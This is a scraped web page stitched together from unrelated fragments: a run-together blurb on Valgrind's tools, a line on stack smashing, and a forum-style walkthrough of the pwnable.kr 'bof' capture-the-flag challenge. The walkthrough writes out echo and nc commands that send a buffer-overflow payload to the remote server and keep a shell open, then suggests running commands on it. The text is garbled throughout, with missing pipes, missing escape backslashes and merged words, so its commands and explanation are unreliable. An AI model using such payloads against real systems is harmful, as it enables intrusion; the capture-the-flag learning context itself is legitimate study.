![Stack Stack](https://robgillen.com/images/stack_start05.png)
You could try to debug the problem using:The Valgrind distribution currentlyincludes six production-quality tools:a memory error detector, two threaderror detectors, a cache andbranch-prediction profiler, acall-graph generating cache profiler,and a heap profiler. It also includestwo experimental tools: aheap/stack/global array overrundetector, and a SimPoint basic blockvector generator. It runs on thefollowing platforms: X86/Linux,AMD64/Linux, PPC32/Linux, PPC64/Linux,and X86/Darwin (Mac OS X).
Here is how 'stack smashing' is actually performed and how its occurrence is detected. Even today, buffer overflows are a threat to computer-system security. Over the last few years, vendors of operating systems have set up their products with different strategies to prevent buffer overflow attacks.
The answer from Jason is the correct solution. However, I wanted to give an alternative answer without Python, but from the terminal. IMO Python is always preferred for better automation, but sometimes you just wanna have a quick exploit done without extra tools.With that in mind, one's natural attempt would be something like below: echo -e 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAxbexbaxfexcax0a' nc pwnable.kr 9000After all, this is an exact replica of the code above in Python, right? Except, the server begs to differ:. stack smashing detected.: /home/bof/bof terminated overflow me:So, what is the problem, then?Think about the command above, for a moment. It sends a bunch of characters to the stdin of the remote process, in the hopes of running /bin/sh.
![Stack Smashing Detected Stack Smashing Detected](/uploads/1/2/4/7/124773880/973927903.png)
However, we still get greeted by the error. The reason for this, is that we are sending the correct payload, but then we are stopping. /bin/sh has no input, so execution continues to the next line, until the stack protector kicks in.The reason why Python works and the echo command doesn't, is continuity. Python doesn't close the stream, while the terminal version does.To prove it, here's a slightly longer version of the terminal exploit, which actually works: echo -e 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAxbexbaxfexcax0a' payload.binFirst, we save the exact payload as before, to a file named payload.bin in this case. Next, we run the following command: cat payload.bin - nc pwnable.kr 9000(Note the - after payload.bin, after cat is done outputting contents of payload.bin, it will start outputting whatever comes in via stdin)And voila! Now you are actually in.
You can try typing shell commands, such as cat flag, or touch /tmp/pwned or whatever you like.Whew! That was long. Hope this info will help other confused souls as it did help me a while ago.